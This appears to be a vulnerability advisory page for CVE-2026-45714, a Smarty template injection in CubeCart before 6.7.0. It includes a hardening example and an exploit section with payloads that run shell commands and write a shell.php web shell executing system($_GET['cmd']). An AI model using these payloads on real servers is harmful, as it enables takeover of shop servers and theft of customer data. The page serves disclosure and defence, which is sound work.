Security Vulnerability Report
CVE-2026-45714 CVSS 9.1 CRITICAL

CVE-2026-45714

Published: 2026-05-13 21:16:50
Last Modified: 2026-05-14 16:49:19

Description

CubeCart is an ecommerce software solution. Prior to 6.7.0, an Authenticated Server-Side Template Injection (SSTI) vulnerability exists in multiple modules of CubeCart (including Email Templates, Invoices, Documents, and Contact Forms). The application unsafely evaluates user-supplied input using the Smarty template engine without enabling Smarty Security Policies. This allows any authenticated user with administrative privileges to execute arbitrary operating system commands (RCE) on the server. This vulnerability is fixed in 6.7.0.
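The root cause described above is a template engine that is handed admin-supplied text and renders it with no security policy in force. As an added illustration (not CubeCart's code and not taken from this advisory), the PHP below shows that unsafe pattern next to a hardened version that installs a Smarty_Security policy. The Smarty class names and policy properties are Smarty's own (Smarty 3.1+/4 API, installed via Composer, is assumed); the function names, the sample template and the variables are constructed here.

```php
<?php
// Added illustration, not CubeCart's code. Assumes Smarty 3.1+/4 via Composer.
require __DIR__ . '/vendor/autoload.php';

// Hardened policy: deny every escape hatch Smarty offers a template author.
// In Smarty_Security, null disables access entirely, whereas an EMPTY ARRAY
// means "no restriction", which is the mistake this class avoids.
class LockedDownPolicy extends Smarty_Security
{
    public $php_functions       = null;   // no PHP functions callable from templates
    public $php_modifiers       = null;   // no PHP functions usable as modifiers
    public $static_classes      = null;   // no Foo::bar() static calls at all
    public $streams             = null;   // no stream resources (php://, etc.)
    public $allow_super_globals = false;  // no $smarty.server / $_GET style access
    public $allow_constants     = false;  // no PHP constants
    public $disabled_tags       = ['php', 'include_php', 'insert'];
}

// Vulnerable pattern: admin-supplied text is compiled and run as a live
// template with the default (disabled) security, so any Smarty construct works.
function renderUnsafe(string $adminTemplate, array $vars): string
{
    $smarty = new Smarty();
    $smarty->assign($vars);
    return $smarty->fetch('string:' . $adminTemplate);   // no security policy
}

// Hardened pattern: identical rendering, but the policy above is enforced at
// compile time, so a template that reaches for {php}, static classes or
// PHP functions is rejected before anything executes.
function renderHardened(string $adminTemplate, array $vars): string
{
    $smarty = new Smarty();
    $smarty->enableSecurity(new LockedDownPolicy());
    $smarty->assign($vars);
    try {
        return $smarty->fetch('string:' . $adminTemplate);
    } catch (SmartyException $e) {
        // A rejected template is a signal worth keeping: log it together with
        // the administrator account that submitted it, and render nothing.
        error_log('Rejected admin template: ' . $e->getMessage());
        return '';
    }
}

// Constructed sample: a benign email template with its variables.
echo renderHardened(
    'Hello {$name|escape}, your order {$order_id} has shipped.',
    ['name' => 'Ada', 'order_id' => 1001]
);
```

The policy is the fix the advisory's description points at; version 6.7.0 is the upstream remedy, and the policy class here is an illustration of the general mechanism rather than a reproduction of that patch. Pairing it with a periodic check that `enableSecurity()` is actually called on every Smarty instance that renders stored templates (email, invoice, document and contact-form modules in this case) closes the gap between "we configured it" and "it is in force".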

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available; the affected range given by the advisory text is:

CubeCart < 6.7.0 (fixed in 6.7.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
smarty
{* Smarty SSTI PoC for CubeCart *}
{* This payload attempts to execute OS commands using the PHP tag if enabled *}
{php}
// Execute a simple system command (e.g., whoami)
$output = shell_exec('whoami');
echo "<pre>Command Output: " . $output . "</pre>";
{/php}
{* Alternative payload using static class calls if PHP tags are disabled but security is off *}
{Smarty_Internal_Write_File::writeFile($script="shell.php", $content="<?php system($_GET['cmd']); ?>", $smarty)}

References

https://github.com/cubecart/v6/security/advisories/GHSA-pcfr-xgc9-xfv6

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45714", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:50.020", "lastModified": "2026-05-14T16:49:18.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeCart is an ecommerce software solution. Prior to 6.7.0, an Authenticated Server-Side Template Injection (SSTI) vulnerability exists in multiple modules of CubeCart (including Email Templates, Invoices, Documents, and Contact Forms). The application unsafely evaluates user-supplied input using the Smarty template engine without enabling Smarty Security Policies. This allows any authenticated user with administrative privileges to execute arbitrary operating system commands (RCE) on the server. This vulnerability is fixed in 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1336"}]}], "references": [{"url": "https://github.com/cubecart/v6/security/advisories/GHSA-pcfr-xgc9-xfv6", "source": "[email protected]"}, {"url": "https://github.com/cubecart/v6/security/advisories/GHSA-pcfr-xgc9-xfv6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}